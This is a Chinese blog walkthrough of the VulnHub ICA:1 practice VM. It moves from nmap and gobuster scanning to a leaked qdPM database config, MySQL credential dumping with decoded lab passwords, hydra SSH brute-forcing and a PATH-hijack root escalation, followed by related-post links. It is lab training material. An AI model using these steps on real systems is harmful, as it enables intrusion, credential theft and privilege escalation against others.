ica1靶机(hydra爆破)

最新推荐文章于 2024-01-05 13:23:09 发布
最新推荐文章于 2024-01-05 13:23:09 发布
阅读量411 收藏 1
点赞数
分类专栏: Walkthrough系列 文章标签: git linux 安全 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/128179494
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:4kn2

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2022.03

信息收集

1.探测目标靶机ip

2.用nmap探测靶机开放端口和服务

nmap -p- -A -sV -T4 192.168.1.107

3.用gobuster扫描网站目录

gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 100 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

4.查看下网页发现cms并且有版本号

漏洞利用

1.搜索版本漏洞可利用脚本,将其下载下来查看

2.根据其提示,进行访问网页

curl -i -L http://192.168.1.107/core/config/databases.yml

3.查看源码,mysql发现用户名和密码

mysql -h 192.168.1.107 -uqdpmadmin -p //登录mysql

4.用qdpm数据库,再查表,查字段后发现是个空的

5.换下数据库,查表,成功查出字段

select * from staff.user;

6.对密码进行base64解密

echo 'c3VSSkFkR3dMcDhkeTNyRg==' | base64 -d

7.将用户名和密码写入文本中,进行爆破,发现没有成功

suRJAdGwLp8dy3rF                                                                                                                    
7ZwV4qtg42cmUXGX                                                                                                                    
X7MQkP3W29fewHdC                                                                                                                    
DJceVy98W28Y7wLg                                                                                                                   
cqNnBWCByS2DuJSy

8.把所有用户名首写字母改成小写的,进行爆破之后成功拿到用户名密码。

hydra -L user.txt -P password.txt ssh://192.168.1.107

权限提升

1.ssh登录成功

2.用find查到一个get_access

strings get_access 找到一个cat命令

3.替换cat实现提权操作

export PATH=/tmp:$PATH

最后执行get_access即可提取!

魏钦6666
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
only ica_Only_nor1x4_matlab_ICA_ICAMATLAB_
09-29
标题 "only ica_Only_nor1x4_matlab_ICA_ICAMATLAB_" 暗示了这是一个关于独立成分分析(Independent Component Analysis, ICA)的项目,使用MATLAB编程语言实现,专注于提高信噪比(PSNR,Peak Signal-to-Noise ...
vulnhub——ICA1靶机
Re1_zf的博客
11-19 658
访问这个地址可以下载http:///core/config/databases.yml。使用export命令将其添加到环境变量中,伪造的内容为/bin/bash。直接cat的话乱码太多,使用strings获取一下其中的命令字符串信息。明显的cat /root/system.info存在漏洞的可能。这里可以看到这是一个完整的系统,并且给出了系统的版本。但是这里的密码经过了base64加密,需要先解密一下。开放了web服务就先查看一下web服务的信息。搜索一下漏洞信息发现存在一个未授权漏洞。
靶机实战(2):ICA 1
OneMoreThink
12-10 101
靶机名称:ICA: 1[1]参考文章:大余每日一攻防ICA: 1(八)实战思路:1.主机发现2.端口发现(服务、组件)3.漏洞发现(获取权限)a.22端口/ssh服务i.组件漏洞ii.弱口令漏洞b.80端口/http服务i.组件漏洞ii.URL发现(目录、文件)iii.信息泄露c.3306端口/mysql服务i.组件漏洞ii.口令泄露4.提升权限a.sudob.perm一、主机发现启动虚拟机,直接...
Vulnhub靶机ica1
最新发布
qq_48904485的博客
01-05 393
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机ica1(10.0.2.5)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/ica-1,748/
ICA: 1 靶场详细教学
weixin_60374959的博客
11-29 960
该靶场前期考验的是我们的信息收集能力,通过信息收集找到一个框架的漏洞,再通过该漏洞进入数据库,找到远程连接ssh的账号密码,通过hydra爆破确认账号密码,内网部分是通过信息收集,主要是通过靶场给的提示去进一步找到文件,然后通过自己创建一个具有权限的文档,达到提权的目的。(有能力的小伙伴可以跟我小编的概述先自己去做一遍,不懂得再去看提升可能会更大哦!)
ICA1 渗透靶场记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
09-29 632
ICA1 靶场渗透攻略向
ECNU_ICA技术明细1
08-03
【ECNU_ICA技术明细1】是关于2021年字节跳动安全AI挑战赛的一个技术分享,主要涉及用户数据、赛题理解和特征工程的细节。此比赛的目标是识别网络黑产中的色情导流用户,通过预测分析来评估模型效果。 1. **题目数据...
fastICA_data1.zip_Fast ICA_fastica
09-20
在这个“fastICA_data1.zip”压缩包中,包含了一个名为“fastICA_data1.m”的MATLAB脚本,这表明它提供了对fastICA算法的一种实现,用于演示或教学目的。 快速ICA的核心思想是寻找数据的非高斯性,因为不同的独立源...
ICA最小二乘1
08-03
ICA(Independent Component Analysis,独立成分分析)是一种统计分析方法,主要目标是将多变量数据集中的观测值分解成几个不可观测的独立成分,这些成分在理论上是相互独立的。在这个过程中,ICA通常用于识别混合...
ICA.rar_ICA
09-24
1. **预处理**:对数据进行预处理,包括去均值、标准化等,使得数据适合后续分析。 2. **估计混合模型**:通过观察数据,建立混合模型,即数据是由未知的源信号经过某个混合矩阵后的结果。 3. **选择分离度量**:...
hydra8.1.rar
05-17
大名鼎鼎的爆破神器hydra8.1,解压即可使用,内含使用说明
使用Hydra对基本身份验证进行暴力破解攻击
qq_39308796的博客
06-21 797
使用Hydra对基本身份验证进行暴力破解攻击
使用hydra进行HTTP认证破解
Kali与编程
07-10 1681
虽然使用密码破解工具可以成功破解HTTP基本认证,但是在实际应用中,请勿使用HTTP基本认证进行身份验证,而应该使用更安全的身份验证机制,例如HTTPS和OAuth。在本文中,我们介绍了使用Hydra进行HTTP表单认证破解。在上面的命令中,我们使用用户名admin,密码字典文件为rockyou.txt,目标URL为http://localhost/login.php,表单数据文件为login-form.txt,POST参数为username和password,以及错误消息为“Login failed”。
vulnhub之ICA1靶机
lionwerson的博客
11-24 3061
https://download.vulnhub.com/ica/ica1.ziphttp://ICA-1靶机下载1.下载靶机,virtualbox网络改为桥接模式,然后开机: 2.nmap扫描一下端口: nmap 192.168.0.11 -p- 有80端口和22端口,先从web端入手: 是一个登录界面,用电子邮箱和用户名登录,不打算先用暴力破解,先sqlmap跑一下: python sqlmap.py -r 1.txt 不过好像不存在sql注入,只能另辟蹊径,这个是一..
【网安神器篇】——hydra爆破工具
热门推荐
Demo不是emo的博客
11-22 1万+
今天给大家分享的神兵利器是一款爆破工具——hydra
【Vulnhub靶场】ICA: 1
DG_s1mple
03-16 3094
环境准备 把下载好的靶机导入到vmware 按照道理来说,这里会给出ip地址,但是我这没有,就得自己探测了 信息收集 使用arp-scan命令来探测靶机的IP地址 靶机IP地址为:192.168.2.16 攻击机IP地址为:192.168.2.17 使用nmap扫描靶机开放的服务和端口 开放了22,80,3306和一个33060端口 渗透开始 我们首先访问它的网站 是一个比较完善的系统,并且下面给出了框架的版本为9.2 我们在kali搜索一下,看有没有已经公开的漏洞 发现有一个漏洞,我们查看一下
vulnhub靶机--ica1
bobo_milk的博客
05-24 602
【vuln靶机ica1
靶机渗透练习66-ICA
hirak0的博客
04-20 805
靶机描述 靶机地址:https://www.vulnhub.com/entry/ica-1,748/ Description According to information from our intelligence network, ICA is working on a secret project. We need to find out what the project is. Once you have the access information, send them to us. We

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值